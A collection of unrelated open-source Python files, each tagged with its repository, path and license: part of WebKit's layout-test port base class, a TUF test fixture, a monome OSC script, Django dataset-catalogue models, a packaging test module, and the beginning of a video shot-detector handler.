if filename.startswith(self.layout_tests_dir()):
return self.host.filesystem.relpath(filename, self.layout_tests_dir())
else:
return self.host.filesystem.abspath(filename)
@memoized
def abspath_for_test(self, test_name):
"""Returns the full path to the file for a given test name. This is the
inverse of relative_test_filename()."""
return self._filesystem.join(self.layout_tests_dir(), test_name)
def results_directory(self):
"""Absolute path to the place to store the test results (uses --results-directory)."""
if not self._results_directory:
option_val = self.get_option('results_directory') or self.default_results_directory()
self._results_directory = self._filesystem.abspath(option_val)
return self._results_directory
def bot_test_times_path(self):
return self._build_path('webkit_test_times', 'bot_times_ms.json')
def perf_results_directory(self):
return self._build_path()
def inspector_build_directory(self):
return self._build_path('resources', 'inspector')
def default_results_directory(self):
"""Absolute path to the default place to store the test results."""
try:
return self.path_from_chromium_base('out', self.get_option('configuration'), 'layout-test-results')
except AssertionError:
return self._build_path('layout-test-results')
def setup_test_run(self):
"""Perform port-specific work at the beginning of a test run."""
# Delete the disk cache if any to ensure a clean test run.
dump_render_tree_binary_path = self._path_to_driver()
cachedir = self._filesystem.dirname(dump_render_tree_binary_path)
cachedir = self._filesystem.join(cachedir, "cache")
if self._filesystem.exists(cachedir):
self._filesystem.rmtree(cachedir)
if self._dump_reader:
self._filesystem.maybe_make_directory(self._dump_reader.crash_dumps_directory())
def num_workers(self, requested_num_workers):
"""Returns the number of available workers (possibly less than the number requested)."""
return requested_num_workers
def clean_up_test_run(self):
"""Perform port-specific work at the end of a test run."""
if self._image_differ:
self._image_differ.stop()
self._image_differ = None
# FIXME: os.environ access should be moved to onto a common/system class to be more easily mockable.
def _value_or_default_from_environ(self, name, default=None):
if name in os.environ:
return os.environ[name]
return default
def _copy_value_from_environ_if_set(self, clean_env, name):
if name in os.environ:
clean_env[name] = os.environ[name]
def setup_environ_for_server(self, server_name=None):
# We intentionally copy only a subset of os.environ when
# launching subprocesses to ensure consistent test results.
clean_env = {
'LOCAL_RESOURCE_ROOT': self.layout_tests_dir(), # FIXME: Is this used?
}
variables_to_copy = [
'WEBKIT_TESTFONTS', # FIXME: Is this still used?
'WEBKITOUTPUTDIR', # FIXME: Is this still used?
'CHROME_DEVEL_SANDBOX',
'CHROME_IPC_LOGGING',
'ASAN_OPTIONS',
'TSAN_OPTIONS',
'MSAN_OPTIONS',
'LSAN_OPTIONS',
'UBSAN_OPTIONS',
'VALGRIND_LIB',
'VALGRIND_LIB_INNER',
]
if self.host.platform.is_linux() or self.host.platform.is_freebsd():
variables_to_copy += [
'XAUTHORITY',
'HOME',
'LANG',
'LD_LIBRARY_PATH',
'DBUS_SESSION_BUS_ADDRESS',
'XDG_DATA_DIRS',
]
clean_env['DISPLAY'] = self._value_or_default_from_environ('DISPLAY', ':1')
if self.host.platform.is_mac():
clean_env['DYLD_LIBRARY_PATH'] = self._build_path()
variables_to_copy += [
'HOME',
]
if self.host.platform.is_win():
variables_to_copy += [
'PATH',
'GYP_DEFINES', # Required to locate win sdk.
]
if self.host.platform.is_cygwin():
variables_to_copy += [
'HOMEDRIVE',
'HOMEPATH',
'_NT_SYMBOL_PATH',
]
for variable in variables_to_copy:
self._copy_value_from_environ_if_set(clean_env, variable)
for string_variable in self.get_option('additional_env_var', []):
[name, value] = string_variable.split('=', 1)
clean_env[name] = value
return clean_env
def show_results_html_file(self, results_filename):
"""This routine should display the HTML file pointed at by
results_filename in a users' browser."""
return self.host.user.open_url(path.abspath_to_uri(self.host.platform, results_filename))
def create_driver(self, worker_number, no_timeout=False):
"""Return a newly created Driver subclass for starting/stopping the test driver."""
return self._driver_class()(self, worker_number, pixel_tests=self.get_option('pixel_tests'), no_timeout=no_timeout)
def start_helper(self):
"""If a port needs to reconfigure graphics settings or do other
things to ensure a known test configuration, it should override this
method."""
helper_path = self._path_to_helper()
if helper_path:
_log.debug("Starting layout helper %s" % helper_path)
# Note: Not thread safe: http://bugs.python.org/issue2320
self._helper = self._executive.popen([helper_path],
stdin=self._executive.PIPE, stdout=self._executive.PIPE, stderr=None)
is_ready = self._helper.stdout.readline()
if not is_ready.startswith('ready'):
_log.error("layout_test_helper failed to be ready")
def requires_http_server(self):
"""Does the port require an HTTP server for running tests? This could
be the case when the tests aren't run on the host platform."""
return False
def start_http_server(self, additional_dirs, number_of_drivers):
"""Start a web server. Raise an error if it can't start or is already running.
Ports can stub this out if they don't need a web server to be running."""
assert not self._http_server, 'Already running an http server.'
server = apache_http.ApacheHTTP(self, self.results_directory(),
additional_dirs=additional_dirs,
number_of_servers=(number_of_drivers * 4))
server.start()
self._http_server = server
def start_websocket_server(self):
"""Start a web server. Raise an error if it can't start or is already running.
Ports can stub this out if they don't need a websocket server to be running."""
assert not self._websocket_server, 'Already running a websocket server.'
server = pywebsocket.PyWebSocket(self, self.results_directory())
server.start()
self._websocket_server = server
def is_wpt_enabled(self):
"""Used as feature flag for WPT Serve feature."""
return self._is_wpt_enabled
def is_wpt_test(self, test):
"""Whether this test is part of a web-platform-tests which require wptserve servers."""
return "web-platform-tests" in test
def start_wptserve(self):
"""Start a WPT web server. Raise an error if it can't start or is already running.
Ports can stub this out if they don't need a WPT web server to be running."""
assert not self._wpt_server, 'Already running an http server.'
assert self.is_wpt_enabled(), 'Cannot start server if WPT is not enabled.'
# We currently don't support any output mechanism for the WPT server.
server = wptserve.WPTServe(self, self.results_directory())
server.start()
self._wpt_server = server
def stop_wptserve(self):
"""Shut down the WPT server if it is running. Do nothing if it isn't."""
if self._wpt_server:
self._wpt_server.stop()
self._wpt_server = None
def http_server_supports_ipv6(self):
# Apache < 2.4 on win32 does not support IPv6, nor does cygwin apache.
if self.host.platform.is_cygwin() or self.host.platform.is_win():
return False
return True
def stop_helper(self):
"""Shut down the test helper if it is running. Do nothing if
it isn't, or it isn't available. If a port overrides start_helper()
it must override this routine as well."""
if self._helper:
_log.debug("Stopping layout test helper")
try:
self._helper.stdin.write("x\n")
self._helper.stdin.close()
self._helper.wait()
except IOError, e:
pass
finally:
self._helper = None
def stop_http_server(self):
"""Shut down the http server if it is running. Do nothing if it isn't."""
if self._http_server:
self._http_server.stop()
self._http_server = None
def stop_websocket_server(self):
"""Shut down the websocket server if it is running. Do nothing if it isn't."""
if self._websocket_server:
self._websocket_server.stop()
self._websocket_server = None
#
# TEST EXPECTATION-RELATED METHODS
#
def test_configuration(self):
"""Returns the current TestConfiguration for the port."""
if not self._test_configuration:
self._test_configuration = TestConfiguration(self._version, self._architecture, self._options.configuration.lower())
return self._test_configuration
# FIXME: Belongs on a Platform object.
@memoized
def all_test_configurations(self):
"""Returns a list of TestConfiguration instances, representing all available
test configurations for this port."""
return self._generate_all_test_configurations()
# FIXME: Belongs on a Platform object.
def configuration_specifier_macros(self):
"""Ports may provide a way to abbreviate configuration specifiers to conveniently
refer to them as one term or alias specific values to more generic ones. For example:
(vista, win7) -> win # Abbreviate all Windows versions into one namesake.
(precise, trusty) -> linux # Change specific name of Linux distro to a more generic term.
Returns a dictionary, each key representing a macro term ('win', for example),
and value being a list of valid configuration specifiers (such as ['vista', 'win7'])."""
return self.CONFIGURATION_SPECIFIER_MACROS
def _generate_all_test_configurations(self):
"""Returns a sequence of the TestConfigurations the port supports."""
# By default, we assume we want to test every graphics type in
# every configuration on every system.
test_configurations = []
for version, architecture in self.ALL_SYSTEMS:
for build_type in self.ALL_BUILD_TYPES:
test_configurations.append(TestConfiguration(version, architecture, build_type))
return test_configurations
def warn_if_bug_missing_in_test_expectations(self):
return True
def _port_specific_expectations_files(self):
paths = []
paths.append(self._filesystem.join(self.layout_tests_dir(), 'NeverFixTests'))
paths.append(self._filesystem.join(self.layout_tests_dir(), 'StaleTestExpectations'))
paths.append(self._filesystem.join(self.layout_tests_dir(), 'SlowTests'))
if self._is_wpt_enabled:
paths.append(self._filesystem.join(self.layout_tests_dir(), 'WPTServeExpectations'))
return paths
def _flag_specific_expectations_files(self):
return [self._filesystem.join(self.layout_tests_dir(), 'FlagExpectations', flag.lstrip('-'))
for flag in self.get_option('additional_driver_flag', [])]
def expectations_dict(self):
"""Returns an OrderedDict of name -> expectations strings.
The names are expected to be (but not required to be) paths in the filesystem.
If the name is a path, the file can be considered updatable for things like rebaselining,
so don't use names that are paths if they're not paths.
Generally speaking the ordering should be files in the filesystem in cascade order
(TestExpectations followed by Skipped, if the port honors both formats),
then any built-in expectations (e.g., from compile-time exclusions), then --additional-expectations options."""
# FIXME: rename this to test_expectations() once all the callers are updated to know about the ordered dict.
expectations = OrderedDict()
for path in self.expectations_files():
if self._filesystem.exists(path):
expectations[path] = self._filesystem.read_text_file(path)
for path in self.get_option('additional_expectations', []):
expanded_path = self._filesystem.expanduser(path)
if self._filesystem.exists(expanded_path):
_log.debug("reading additional_expectations from path '%s'" % path)
expectations[path] = self._filesystem.read_text_file(expanded_path)
else:
_log.warning("additional_expectations path '%s' does not exist" % path)
return expectations
def bot_expectations(self):
if not self.get_option('ignore_flaky_tests'):
return {}
full_port_name = self.determine_full_port_name(self.host, self._options, self.port_name)
builder_category = self.get_option('ignore_builder_category', 'layout')
factory = BotTestExpectationsFactory()
# FIXME: This only grabs release builder's flakiness data. If we're running debug,
# when we should grab the debug builder's data.
expectations = factory.expectations_for_port(full_port_name, builder_category)
if not expectations:
return {}
ignore_mode = self.get_option('ignore_flaky_tests')
if ignore_mode == 'very-flaky' or ignore_mode == 'maybe-flaky':
return expectations.flakes_by_path(ignore_mode == 'very-flaky')
if ignore_mode == 'unexpected':
return expectations.unexpected_results_by_path()
_log.warning("Unexpected ignore mode: '%s'." % ignore_mode)
return {}
def expectations_files(self):
return ([self.path_to_generic_test_expectations_file()] +
self._port_specific_expectations_files() +
self._flag_specific_expectations_files())
def repository_path(self):
"""Returns the repository path for the chromium code base."""
return self.path_from_chromium_base('build')
_WDIFF_DEL = '##WDIFF_DEL##'
_WDIFF_ADD = '##WDIFF_ADD##'
_WDIFF_END = '##WDIFF_END##'
def _format_wdiff_output_as_html(self, wdiff):
wdiff = cgi.escape(wdiff)
wdiff = wdiff.replace(self._WDIFF_DEL, "<span class=del>")
wdiff = wdiff.replace(self._WDIFF_ADD, "<span class=add>")
wdiff = wdiff.replace(self._WDIFF_END, "</span>")
html = "<head><style>.del { background: #faa; } "
html += ".add { background: #afa; }</style></head>"
html += "<pre>%s</pre>" % wdiff
return html
def _wdiff_command(self, actual_filename, expected_filename):
executable = self._path_to_wdiff()
return [executable,
"--start-delete=%s" % self._WDIFF_DEL,
"--end-delete=%s" % self._WDIFF_END,
"--start-insert=%s" % self._WDIFF_ADD,
"--end-insert=%s" % self._WDIFF_END,
actual_filename,
expected_filename]
@staticmethod
def _handle_wdiff_error(script_error):
# Exit 1 means the files differed, any other exit code is an error.
if script_error.exit_code != 1:
raise script_error
def _run_wdiff(self, actual_filename, expected_filename):
"""Runs wdiff and may throw exceptions.
This is mostly a hook for unit testing."""
# Diffs are treated as binary as they may include multiple files
# with conflicting encodings. Thus we do not decode the output.
command = self._wdiff_command(actual_filename, expected_filename)
wdiff = self._executive.run_command(command, decode_output=False,
error_handler=self._handle_wdiff_error)
return self._format_wdiff_output_as_html(wdiff)
_wdiff_error_html = "Failed to run wdiff, see error log."
def wdiff_text(self, actual_filename, expected_filename):
"""Returns a string of HTML indicating the word-level diff of the
contents of the two filenames. Returns an empty string if word-level
diffing isn't available."""
if not self.wdiff_available():
return ""
try:
# It's possible to raise a ScriptError we pass wdiff invalid paths.
return self._run_wdiff(actual_filename, expected_filename)
except OSError as e:
if e.errno in [errno.ENOENT, errno.EACCES, errno.ECHILD]:
# Silently ignore cases where wdiff is missing.
self._wdiff_available = False
return ""
raise
except ScriptError as e:
_log.error("Failed to run wdiff: %s" % e)
self._wdiff_available = False
return self._wdiff_error_html
# This is a class variable so we can test error output easily.
_pretty_patch_error_html = "Failed to run PrettyPatch, see error log."
def pretty_patch_text(self, diff_path):
if self._pretty_patch_available is None:
self._pretty_patch_available = self.check_pretty_patch(logging=False)
if not self._pretty_patch_available:
return self._pretty_patch_error_html
command = ("ruby", "-I", self._filesystem.dirname(self._pretty_patch_path),
self._pretty_patch_path, diff_path)
try:
# Diffs are treated as binary (we pass decode_output=False) as they
# may contain multiple files of conflicting encodings.
return self._executive.run_command(command, decode_output=False)
except OSError, e:
# If the system is missing ruby log the error and stop trying.
self._pretty_patch_available = False
_log.error("Failed to run PrettyPatch (%s): %s" % (command, e))
return self._pretty_patch_error_html
except ScriptError, e:
# If ruby failed to run for some reason, log the command
# output and stop trying.
self._pretty_patch_available = False
_log.error("Failed to run PrettyPatch (%s):\n%s" % (command, e.message_with_output()))
return self._pretty_patch_error_html
def default_configuration(self):
return self._config.default_configuration()
def clobber_old_port_specific_results(self):
pass
# FIXME: This does not belong on the port object.
@memoized
def path_to_apache(self):
"""Returns the full path to the apache binary.
This is needed only by ports that use the apache_http_server module."""
raise NotImplementedError('Port.path_to_apache')
def path_to_apache_config_file(self):
"""Returns the full path to the apache configuration file.
If the WEBKIT_HTTP_SERVER_CONF_PATH environment variable is set, its
contents will be used instead.
This is needed only by ports that use the apache_http_server module."""
config_file_from_env = os.environ.get('WEBKIT_HTTP_SERVER_CONF_PATH')
if config_file_from_env:
if not self._filesystem.exists(config_file_from_env):
raise IOError('%s was not found on the system' % config_file_from_env)
return config_file_from_env
config_file_name = self._apache_config_file_name_for_platform()
return self._filesystem.join(self.layout_tests_dir(), 'http', 'conf', config_file_name)
#
# PROTECTED ROUTINES
#
# The routines below should only be called by routines in this class
# or any of its subclasses.
#
def _apache_version(self):
config = self._executive.run_command([self.path_to_apache(), '-v'])
return re.sub(r'(?:.|\n)*Server version: Apache/(\d+\.\d+)(?:.|\n)*', r'\1', config)
def _apache_config_file_name_for_platform(self):
if self.host.platform.is_cygwin():
return 'cygwin-httpd.conf' # CYGWIN is the only platform to still use Apache 1.3.
if self.host.platform.is_linux():
distribution = self.host.platform.linux_distribution()
custom_configuration_distributions = ['arch', 'debian', 'redhat']
if distribution in custom_configuration_distributions:
return "%s-httpd-%s.conf" % (distribution, self._apache_version())
return 'apache2-httpd-' + self._apache_version() + '.conf'
def _path_to_driver(self, target=None):
"""Returns the full path to the test driver."""
return self._build_path(target, self.driver_name())
def _path_to_webcore_library(self):
"""Returns the full path to a built copy of WebCore."""
return None
def _path_to_helper(self):
"""Returns the full path to the layout_test_helper binary, which
is used to help configure the system for the test run, or None
if no helper is needed.
This is likely only used by start/stop_helper()."""
return None
def _path_to_image_diff(self):
"""Returns the full path to the image_diff binary, or None if it is not available.
This is likely used only by diff_image()"""
return self._build_path('image_diff')
@memoized
def _path_to_wdiff(self):
"""Returns the full path to the wdiff binary, or None if it is not available.
This is likely used only by wdiff_text()"""
for path in ("/usr/bin/wdiff", "/usr/bin/dwdiff"):
if self._filesystem.exists(path):
return path
return None
def _webkit_baseline_path(self, platform):
"""Return the full path to the top of the baseline tree for a
given platform."""
return self._filesystem.join(self.layout_tests_dir(), 'platform', platform)
def _driver_class(self):
"""Returns the port's driver implementation."""
return driver.Driver
def output_contains_sanitizer_messages(self, output):
if not output:
return None
if 'AddressSanitizer' in output:
return 'AddressSanitizer'
if 'MemorySanitizer' in output:
return 'MemorySanitizer'
return None
def _get_crash_log(self, name, pid, stdout, stderr, newer_than):
if self.output_contains_sanitizer_messages(stderr):
# Running the symbolizer script can take a lot of memory, so we need to
# serialize access to it across all the concurrently running drivers.
llvm_symbolizer_path = self.path_from_chromium_base(
'third_party', 'llvm-build', 'Release+Asserts', 'bin', 'llvm-symbolizer')
if self._filesystem.exists(llvm_symbolizer_path):
env = os.environ.copy()
env['LLVM_SYMBOLIZER_PATH'] = llvm_symbolizer_path
else:
env = None
sanitizer_filter_path = self.path_from_chromium_base('tools', 'valgrind', 'asan', 'asan_symbolize.py')
sanitizer_strip_path_prefix = 'Release/../../'
if self._filesystem.exists(sanitizer_filter_path):
stderr = self._executive.run_command(
['flock', sys.executable, sanitizer_filter_path, sanitizer_strip_path_prefix], input=stderr, decode_output=False, env=env)
name_str = name or '<unknown process name>'
pid_str = str(pid or '<unknown>')
# We require stdout and stderr to be bytestrings, not character strings.
if stdout:
assert isinstance(stdout, str)
stdout_lines = stdout.decode('utf8', 'replace').splitlines()
else:
stdout_lines = [u'<empty>']
if stderr:
assert isinstance(stderr, str)
stderr_lines = stderr.decode('utf8', 'replace').splitlines()
else:
stderr_lines = [u'<empty>']
return (stderr, 'crash log for %s (pid %s):\n%s\n%s\n' % (name_str, pid_str,
'\n'.join(('STDOUT: ' + l) for l in stdout_lines),
'\n'.join(('STDERR: ' + l) for l in stderr_lines)))
def look_for_new_crash_logs(self, crashed_processes, start_time):
pass
def look_for_new_samples(self, unresponsive_processes, start_time):
pass
def sample_process(self, name, pid):
pass
def physical_test_suites(self):
return [
# For example, to turn on force-compositing-mode in the svg/ directory:
# PhysicalTestSuite('svg', ['--force-compositing-mode']),
PhysicalTestSuite('fast/text', ["--enable-direct-write", "--enable-font-antialiasing"]),
]
def virtual_test_suites(self):
if self._virtual_test_suites is None:
path_to_virtual_test_suites = self._filesystem.join(self.layout_tests_dir(), 'VirtualTestSuites')
assert self._filesystem.exists(path_to_virtual_test_suites), 'LayoutTests/VirtualTestSuites not found'
try:
test_suite_json = json.loads(self._filesystem.read_text_file(path_to_virtual_test_suites))
self._virtual_test_suites = [VirtualTestSuite(**d) for d in test_suite_json]
except ValueError as e:
raise ValueError("LayoutTests/VirtualTestSuites is not a valid JSON file: %s" % str(e))
return self._virtual_test_suites
def _all_virtual_tests(self, suites):
tests = []
for suite in suites:
self._populate_virtual_suite(suite)
tests.extend(suite.tests.keys())
return tests
def _virtual_tests_matching_paths(self, paths, suites):
tests = []
for suite in suites:
if any(p.startswith(suite.name) for p in paths):
self._populate_virtual_suite(suite)
for test in suite.tests:
if any(test.startswith(p) for p in paths):
tests.append(test)
return tests
def _populate_virtual_suite(self, suite):
if not suite.tests:
base_tests = self._real_tests([suite.base])
suite.tests = {}
for test in base_tests:
suite.tests[test.replace(suite.base, suite.name, 1)] = test
def is_virtual_test(self, test_name):
return bool(self.lookup_virtual_suite(test_name))
def lookup_virtual_suite(self, test_name):
for suite in self.virtual_test_suites():
if test_name.startswith(suite.name):
return suite
return None
def lookup_virtual_test_base(self, test_name):
suite = self.lookup_virtual_suite(test_name)
if not suite:
return None
return test_name.replace(suite.name, suite.base, 1)
def lookup_virtual_test_args(self, test_name):
for suite in self.virtual_test_suites():
if test_name.startswith(suite.name):
return suite.args
return []
def lookup_virtual_reference_args(self, test_name):
for suite in self.virtual_test_suites():
if test_name.startswith(suite.name):
return suite.reference_args
return []
def lookup_physical_test_args(self, test_name):
for suite in self.physical_test_suites():
if test_name.startswith(suite.name):
return suite.args
return []
def lookup_physical_reference_args(self, test_name):
for suite in self.physical_test_suites():
if test_name.startswith(suite.name):
return suite.reference_args
return []
def should_run_as_pixel_test(self, test_input):
if not self._options.pixel_tests:
return False
if self._options.pixel_test_directories:
return any(test_input.test_name.startswith(directory) for directory in self._options.pixel_test_directories)
# TODO(burnik): Make sure this is the right way to do it.
if self.is_wpt_enabled() and self.is_wpt_test(test_input.test_name):
return False
return True
def _modules_to_search_for_symbols(self):
path = self._path_to_webcore_library()
if path:
return [path]
return []
def _symbols_string(self):
symbols = ''
for path_to_module in self._modules_to_search_for_symbols():
try:
symbols += self._executive.run_command(['nm', path_to_module], error_handler=self._executive.ignore_error)
except OSError, e:
_log.warn("Failed to run nm: %s. Can't determine supported features correctly." % e)
return symbols
# Ports which use compile-time feature detection should define this method and return
# a dictionary mapping from symbol substrings to possibly disabled test directories.
# When the symbol substrings are not matched, the directories will be skipped.
# If ports don't ever enable certain features, then those directories can just be
# in the Skipped list instead of compile-time-checked here.
def _missing_symbol_to_skipped_tests(self):
if self.PORT_HAS_AUDIO_CODECS_BUILT_IN:
return {}
else:
return {
"ff_mp3_decoder": ["webaudio/codec-tests/mp3"],
"ff_aac_decoder": ["webaudio/codec-tests/aac"],
}
def _has_test_in_directories(self, directory_lists, test_list):
if not test_list:
return False
directories = itertools.chain.from_iterable(directory_lists)
for directory, test in itertools.product(directories, test_list):
if test.startswith(directory):
return True
return False
def _skipped_tests_for_unsupported_features(self, test_list):
# Only check the symbols of there are tests in the test_list that might get skipped.
# This is a performance optimization to avoid the calling nm.
# Runtime feature detection not supported, fallback to static detection:
# Disable any tests for symbols missing from the executable or libraries.
if self._has_test_in_directories(self._missing_symbol_to_skipped_tests().values(), test_list):
symbols_string = self._symbols_string()
if symbols_string is not None:
return reduce(operator.add, [directories for symbol_substring, directories in self._missing_symbol_to_skipped_tests().items() if symbol_substring not in symbols_string], [])
return []
def _convert_path(self, path):
"""Handles filename conversion for subprocess command line args."""
# See note above in diff_image() for why we need this.
if sys.platform == 'cygwin':
return cygpath(path)
return path
def _build_path(self, *comps):
return self._build_path_with_target(self._options.target, *comps)
def _build_path_with_target(self, target, *comps):
# Note that we don't do the option caching that the
# base class does, because finding the right directory is relatively
# fast.
target = target or self.get_option('target')
return self._static_build_path(self._filesystem, self.get_option('build_directory'),
self.path_from_chromium_base(), target, comps)
def _check_driver_build_up_to_date(self, target):
# We should probably get rid of this check altogether as it has
# outlived its usefulness in a GN-based world, but for the moment
# we will just check things if they are using the standard
# Debug or Release target directories.
if target not in ('Debug', 'Release'):
return True
try:
debug_path = self._path_to_driver('Debug')
release_path = self._path_to_driver('Release')
debug_mtime = self._filesystem.mtime(debug_path)
release_mtime = self._filesystem.mtime(release_path)
if (debug_mtime > release_mtime and target == 'Release' or
release_mtime > debug_mtime and target == 'Debug'):
most_recent_binary = 'Release' if target == 'Debug' else 'Debug'
_log.warning('You are running the %s binary. However the %s binary appears to be more recent. '
'Please pass --%s.', target, most_recent_binary, most_recent_binary.lower())
_log.warning('')
# This will fail if we don't have both a debug and release binary.
# That's fine because, in this case, we must already be running the
# most up-to-date one.
except OSError:
pass
return True
def _chromium_baseline_path(self, platform):
if platform is None:
platform = self.name()
return self.path_from_webkit_base('LayoutTests', 'platform', platform)
class VirtualTestSuite(object):
def __init__(self, prefix=None, base=None, args=None, references_use_default_args=False):
assert base
assert args
assert prefix.find('/') == -1, "Virtual test suites prefixes cannot contain /'s: %s" % prefix
self.name = 'virtual/' + prefix + '/' + base
self.base = base
self.args = args
self.reference_args = [] if references_use_default_args else args
self.tests = {}
def __repr__(self):
return "VirtualTestSuite('%s', '%s', %s, %s)" % (self.name, self.base, self.args, self.reference_args)
class PhysicalTestSuite(object):
def __init__(self, base, args, reference_args=None):
self.name = base
self.base = base
self.args = args
self.reference_args = args if reference_args is None else reference_args
self.tests = set()
def __repr__(self):
return "PhysicalTestSuite('%s', '%s', %s, %s)" % (self.name, self.base, self.args, self.reference_args)
| was4444/chromium.src | third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/port/base.py | Python | bsd-3-clause | 78,408 |
# Delegation tree
#
# Targets
# / \
# a f
# / \
# b e
# / \
# c d
#
# No terminating delegations.
#
# Roles should be evaluated in the order:
# Targets > a > b > c > d > e > f
from fixtures.builder import FixtureBuilder
def build():
FixtureBuilder('TUFTestFixture3LevelDelegation')\
.publish(with_client=True)\
.create_target('targets.txt')\
.delegate('a', ['*.txt'])\
.create_target('a.txt', signing_role='a')\
.delegate('b', ['*.txt'], parent='a') \
.create_target('b.txt', signing_role='b') \
.delegate('c', ['*.txt'], parent='b') \
.create_target('c.txt', signing_role='c') \
.delegate('d', ['*.txt'], parent='b') \
.create_target('d.txt', signing_role='d') \
.delegate('e', ['*.txt'], parent='a') \
.create_target('e.txt', signing_role='e') \
.delegate('f', ['*.txt']) \
.create_target('f.txt', signing_role='f') \
.publish()
| theupdateframework/go-tuf | client/testdata/php-tuf-fixtures/TUFTestFixture3LevelDelegation/__init__.py | Python | bsd-3-clause | 1,041 |
import liblo
import time
from liblo import make_method
target = liblo.Address(12002)
class SerialOsc(liblo.Server):
def __init__(self, *args, **kwargs):
liblo.Server.__init__(self, *args, **kwargs)
self.devices = []
@make_method('/serialosc/device', 'ssi')
def list_device(self, path, args):
print path, args
id_, type_, port = args
print port
device = liblo.Address(port)
liblo.send(device, '/sys/prefix', 'monome')
liblo.send(device, '/sys/host', 'localhost')
liblo.send(device, '/sys/port', self.port)
self.devices.append(device)
@make_method('/monome/grid/key', 'iii')
def button(self, path, args):
(x, y, b) = args
print x, y
for d in self.devices:
liblo.send(d, '/monome/grid/led/set', x, y, b)
@make_method(None, None)
def fallback(self, path, args):
print path, args
s = SerialOsc()
liblo.send(target, '/serialosc/list', 'localhost', s.port)
while True:
s.recv(100)
| litghost/etherdream_toys | monome_test.py | Python | bsd-3-clause | 1,048 |
from django.db import models
from django.contrib.postgres.fields import ArrayField
from localflavor.us.us_states import US_STATES
from django.core.urlresolvers import reverse
from django.utils.text import slugify
from common.models import TimestampedModel
import uuid
STATE_NATL_CHOICES = (('US', 'National'),) + US_STATES
STATE_NATL_LOOKUP = dict(STATE_NATL_CHOICES)
class Category(TimestampedModel):
name = models.CharField(max_length=50)
slug = models.SlugField(max_length=70, editable=False)
parent = models.ForeignKey("self", related_name="children", null=True, blank=True)
class Meta:
verbose_name = "Category"
verbose_name_plural = "Categories"
ordering = ['parent__name', 'name']
unique_together = ("name", "parent")
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(Category, self).save(*args, **kwargs)
@property
def path(self):
return self._calculate_pathname(False)
@property
def slugged_path(self):
return self._calculate_pathname(True)
def _calculate_pathname(self, slugged):
name = self.slug if slugged else self.name
if self.parent:
parent_name = str(self.parent.slug) if slugged else str(self.parent.name)
return "{parent_name}/{name}".format(name=name, parent_name=parent_name)
else:
return "{name}".format(name=name)
def get_absolute_url(self):
kwargs = {'category': self.parent.slug if self.parent else self.slug}
if self.parent:
kwargs['subcategory'] = self.slug
return reverse('datasets-by-category', kwargs=kwargs)
def __str__(self):
return self.path
class Dataset(TimestampedModel):
uuid = models.UUIDField(default=uuid.uuid4, editable=False)
# General
title = models.TextField()
url = models.URLField(blank=True, null=True, max_length=500)
description = models.TextField(blank=True)
group_name = models.CharField(db_index=True, max_length=150,
help_text="Name of group administering dataset.")
categories = models.ManyToManyField("Category")
tags = ArrayField(models.CharField(max_length=50), blank=True, default=[],
help_text="Tags, separated by commas.")
# Location
states = ArrayField(models.CharField(choices=STATE_NATL_CHOICES, max_length=2), default=[],
help_text="List of state abbreviations: NC, CA, PA, etc. Use 'US' for a national dataset")
division_names = ArrayField(models.CharField(max_length=150), default=[],
help_text='Describes one or more geographic divisions such as a city or county.')
# Resource Information
resource_location = models.TextField(blank=True,
help_text='Describes where in a resource to find the dataset.')
updated = models.NullBooleanField(help_text="Does this resource get updated?")
frequency = models.CharField(blank=True, max_length=50,
help_text="How often this resource is updated.")
sectors = ArrayField(models.CharField(max_length=40), blank=True, default=[],
help_text="Sectors responsible for the data resource, such as \
'Private' or 'Government' or 'Non-Profit', separated by commas.")
# Data Properties
mappable = models.NullBooleanField(help_text="Can the information be put on a map, i.e. a crime map?")
population_data = models.NullBooleanField(help_text="Does this dataset include population data?")
formats = ArrayField(models.CharField(max_length=40), blank=True, default=[],
help_text="Enter formats, separated by commas")
data_range = models.CharField(blank=True, max_length=100,
help_text="Human-readable description of the time period covered in the data.")
# Availability
internet_available = models.NullBooleanField(help_text="Is this dataset available online?")
access_type = models.CharField(db_index=True, blank=True, max_length=50,
help_text="Description of how data can be accessed, and if it is machine readable.")
# Associated Information
associated_legislation = models.TextField(blank=True)
associated_grant = models.TextField(blank=True,
help_text="Name of associated grant that funds the dataset, if available.")
class Meta:
get_latest_by = 'created_at'
verbose_name = "Dataset"
verbose_name_plural = "Datasets"
ordering = ['states', '-updated_at', 'url']
def states_expanded(self):
return (STATE_NATL_LOOKUP[s] for s in self.states)
def get_states_display(self):
return ", ".join(self.states_expanded())
def get_states_abbr_display(self):
return ", ".join(self.states)
def get_division_names_display(self):
return ", ".join(self.division_names)
def get_absolute_url(self):
return reverse('dataset-detail', args=[str(self.uuid)])
def __str__(self):
return "{states} ({sectors}): {title}".format(states=self.get_states_display(),
title=self.title,
sectors=",".join(self.sectors))
| sunlightlabs/hall-of-justice | cjdata/models.py | Python | bsd-3-clause | 5,438 |
# -*- coding: utf-8 -*-
import sys
def main():
sys.exit(42)
def test_is_compiled():
global __cached__, __file__
try:
source = __cached__ or __file__
except NameError:
source = __file__
assert source.endswith('.pyc')
def test_extras():
from extension_dist.test_ext import get_the_answer
assert get_the_answer() == 42
def test_no_extras():
try:
import extension_dist # noqa
except ImportError:
pass
else:
assert False, "extra was insatlled when it shouldn't have been"
| dairiki/humpty | tests/dist1/dist1.py | Python | bsd-3-clause | 558 |
# -*- coding: utf8 -*-
"""
This is part of shot detector.
Produced by w495 at 2017.05.04 04:18:27
"""
from __future__ import absolute_import, division, print_function
import datetime
import logging
import av
import six
# noinspection PyUnresolvedReferences
from av.container import InputContainer
from shot_detector.objects import (
BaseFrame,
FramePosition
)
from shot_detector.utils.common import get_objdata_dict
from shot_detector.utils.log_meta import (
LogMeta,
ignore_log_meta,
should_be_overloaded
)
class BaseHandler(six.with_metaclass(LogMeta)):
"""
Finite State Machine for video handling.
Works with video at law level.
Splits video into frames.
You should implement `handle_frame` method.
"""
__logger = logging.getLogger(__name__)
def handle_video(self,
input_uri='',
format_name=None,
**kwargs):
"""
Runs video handling
:param str input_uri:
file name of input video or path to resource
for example `http://localhost:8090/live.flv`
You can use any string, that can be accepted
by input ffmpeg-parameter. For example:
* 'udp://127.0.0.1:1234';
* 'tcp://localhost:1234?listen';
* 'http://localhost:8090/live.flv'.
:param str format_name:
name of video format. Use it for hardware devices.
:param dict kwargs: any options for consecutive methods,
ignores it and pass it through
:return:
"""
# noinspection PyUnresolvedReferences
video_container = av.open(
file=input_uri,
format=format_name,
)
logger = self.__logger
if logger.isEnabledFor(logging.INFO):
